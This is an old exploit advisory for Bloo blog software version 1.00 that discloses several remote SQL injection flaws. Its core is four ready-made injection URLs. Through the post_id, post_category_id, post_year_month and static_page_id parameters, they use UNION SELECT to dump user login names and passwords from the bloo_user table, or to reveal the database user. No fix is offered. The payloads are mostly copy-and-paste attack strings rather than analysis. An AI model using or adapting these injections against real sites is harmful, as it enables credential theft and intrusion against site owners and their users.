Bloo <= 1.00 Multiple Remote SQL Injection Vulnerabilities

2008-03-11 00:00:00

--==+================================================================================+==--
--==+ Bloo - Object Oriented Blog Software <= v.1.00 Remote Sql Injection +==--
--==+================================================================================+==--

Author: MhZ91
Title: Bloo - Object Oriented Blog Software <= v.1.00 Remote Sql Injection
Download: http://sourceforge.net/project/showfiles.php?group_id=160870
Bug: Remote Sql Injection
Info: Bloo is a free, public-domain, object-oriented implementation of full-featured blog software, based on the Phoo Phramework. You can visit the Bloo home wiki at http://outofthebloo.com.
Visit: http://www.inj3ct-it.org

[*]----------------------------------------------------------

Bloo - Object Oriented Blog Software <= v.1.00 present more sql injection...

http://www.example.com/index.php?post_id=1+union+select+1,concat(login_id,char(58),password),3,4,5,6,7,8+from+bloo_user/*

http://www.example.com/index.php?post_category_id=1+union+select+1,2,3,4,concat(login_id,char(58),password),6,7,8+from+bloo_user/*

http://www.example.com/index.php?post_year_month=[NumberIdOfExistentPost]+union+select+1,2,3,4,concat(login_id,char(58),password),6,7,8+from+bloo_user/*

http://www.example.com/index.php?static_page_id=1+union+select+1,user(),3,4,5,6/*

etc...

etc...

etc...

I think there are other sql injection in this blog lol

[*]----------------------------------------------------------

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.